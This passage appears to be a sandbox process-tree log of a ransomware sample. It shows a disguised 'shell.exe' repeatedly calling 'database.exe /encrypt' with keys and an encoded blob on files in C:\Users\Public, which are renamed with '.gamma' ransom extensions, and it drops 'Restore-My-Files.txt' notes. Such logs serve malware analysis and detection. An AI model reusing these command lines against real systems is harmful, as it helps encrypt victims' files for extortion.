                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7420
